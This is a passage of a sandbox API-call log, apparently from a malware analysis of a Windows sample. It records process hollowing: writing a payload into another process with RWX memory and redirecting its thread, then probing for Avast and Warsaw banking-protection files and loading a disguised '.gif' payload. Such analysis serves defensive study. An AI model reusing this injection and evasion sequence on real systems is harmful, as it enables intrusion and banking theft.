[77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffda000, Edx=0x0, Ecx=0x0, Eax=0xfe2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0xcfa88, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0107.093] ReadProcessMemory (in: hProcess=0xf4, lpBaseAddress=0x7ffda008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0107.093] VirtualAllocEx (hProcess=0xf4, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0107.093] VirtualAlloc (lpAddress=0x1974000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1974000
[0107.100] WriteProcessMemory (in: hProcess=0xf4, lpBaseAddress=0x400000, lpBuffer=0x197332c*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x197332c*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0107.113] WriteProcessMemory (in: hProcess=0xf4, lpBaseAddress=0x7ffda008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0107.113] SetThreadContext (hThread=0xf8, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffda000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0xcfa88, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0107.113] ResumeThread (hThread=0xf8) returned 0x1
[0107.150] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0107.150] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0107.150] GlobalUnlock (hMem=0x189000c) returned 0
[0107.150] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0107.150] GlobalUnlock (hMem=0x1890004) returned 0
[0107.158] Sleep (dwMilliseconds=0xe74e)
[0117.197] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0117.197] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0117.197] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0117.197] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0117.197] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100
[0117.197] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0117.197] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0117.197] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0117.197] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0117.199] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0117.199] ReadFile (in: hFile=0x100, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0117.204] CloseHandle (hObject=0x100) returned 1
[0117.204] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.205] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.205] GlobalUnlock (hMem=0x189000c) returned 0
[0117.205] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0117.205] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.206] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.206] GlobalUnlock (hMem=0x189000c) returned 0
[0117.206] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0117.206] GlobalLock (hMem=0x189000c) returned 0x25f110
[0117.207] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0117.207] GlobalUnlock (hMem=0x189000c) returned 0
[0117.207] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0117.207] GlobalLock (hMem=0x189000c) returned 0x265120
[0117.208] GlobalHandle (pMem=0x265120) returned 0x189000c
[0117.208] GlobalUnlock (hMem=0x189000c) returned 0
[0117.208] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0117.208] GlobalLock (hMem=0x189000c) returned 0x265120
[0117.209] GlobalHandle (pMem=0x265120) returned 0x189000c
[0117.209] GlobalUnlock (hMem=0x189000c) returned 0
[0117.209] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0117.210] GlobalLock (hMem=0x189000c) returned 0x26f130
[0117.210] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0117.210] GlobalUnlock (hMem=0x189000c) returned 0
[0117.210] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0117.210] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.211] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.211] GlobalUnlock (hMem=0x189000c) returned 0
[0117.211] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0117.211] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.212] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.212] GlobalUnlock (hMem=0x189000c) returned 0
[0117.212] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0117.212] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.213] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.213] GlobalUnlock (hMem=0x189000c) returned 0
[0117.213] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0117.213] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.213] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.213] GlobalUnlock (hMem=0x189000c) returned 0
[0117.213] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0117.213] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.214] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.214] GlobalUnlock (hMem=0x189000c) returned 0
[0117.214] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0117.214] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.215] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.215] GlobalUnlock (hMem=0x189000c) returned 0
[0117.215] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0117.215] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.216] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.216] GlobalUnlock (hMem=0x189000c) returned 0
[0117.216] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0117.216] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.216] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.216] GlobalUnlock (hMem=0x189000c) returned 0
[0117.216] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0117.216] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.217] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.217] GlobalUnlock (hMem=0x189000c) returned 0
[0117.217] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0117.217] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.218] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.218] GlobalUnlock (hMem=0x189000c) returned 0
[0117.218] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0117.220] GlobalLock (hMem=0x189000c) returned 0x27b110
[0117.220] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0117.220] GlobalUnlock (hMem=0x189000c) returned 0
[0117.220] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0117.220] GlobalLock (hMem=0x189000c) returned 0x27b110
[0117.221] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0117.221] GlobalUnlock (hMem=0x189000c) returned 0
[0117.221] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0117.223] GlobalLock (hMem=0x189000c) returned 0x29f120
[0117.224] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0117.224] GlobalUnlock (hMem=0x189000c) returned 0
[0117.224] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0117.224] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.224] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.224] GlobalUnlock (hMem=0x189000c) returned 0
[0117.224] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0117.225] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.225] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.225] GlobalUnlock (hMem=0x189000c) returned 0
[0117.225] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0117.225] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.226] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.226] GlobalUnlock (hMem=0x189000c) returned 0
[0117.226] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0117.226] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.227] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.227] GlobalUnlock (hMem=0x189000c) returned 0
[0117.227] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0117.227] GlobalLock (hMem=0x189000c) returned 0x25b100
[0117.228] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0117.228] GlobalUnlock (hMem=0x189000c) returned 0
